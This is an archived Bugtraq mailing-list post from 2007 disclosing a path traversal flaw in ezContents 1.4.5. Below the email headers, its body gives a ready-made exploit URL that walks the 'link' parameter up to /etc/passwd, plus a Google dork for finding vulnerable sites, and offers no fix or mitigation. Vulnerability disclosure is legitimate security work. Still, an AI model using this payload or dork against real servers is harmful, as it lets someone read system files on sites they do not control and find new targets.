ezContents Version 1.4.5 Remote File Disclosure Vulnerability.
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: ezContents Version 1.4.5 Remote File Disclosure Vulnerability.
- From: p4imi0 <p4imi0@xxxxxxxxx>
- Date: Wed, 5 Dec 2007 23:33:43 +0100
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=J5ELyGIfVEx8iC/sfe7zjpg2a/JROgdU5p/xX4jl+xA=; b=nnRrIkBzFZ15FZMFUt45llr8rTQ28Dju5RxMsIQvB2HacPVRYiVuikdYeJ7dlCd/84DulrAbqotlN+M4WOQpn6znIrmxRsRYCNbKBmnbAFIu6nm1mk0zZklKVrEjCQQuslFxueluk92dBb7cN/CNljAg3PStVdQxW73bZEKXHgk=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=Ot85k5zv4xAm8YDyqHwFOQug5LCRb7mzzlGUprjJ7lIgTVXRHPgXsOWYiKvonNyeGehT5OOiYQGwURZ6+8UvNG7a4+SAPOy7Efzev9+Guo6Fj8sSBnA20xxLUiX1Izj37DohGam13bexj+0ylQLbKfyiqkR/EI8JtisrmKSlhS0=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
--------------------------------------------------------------
ezContents Version 1.4.5 Remote File Disclosure Vulnerability.
--------------------------------------------------------------
download : http://www.visualshapers.com/
author : p4imi0
contact : p4imi0@xxxxxxxxx
exploit :
/ezcontents1_4x/index.php?link=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
google dork : inurl:"index.php?link=" Powered by ezContents Version 1.4.5
thanks to : str0ke, Cr[]w.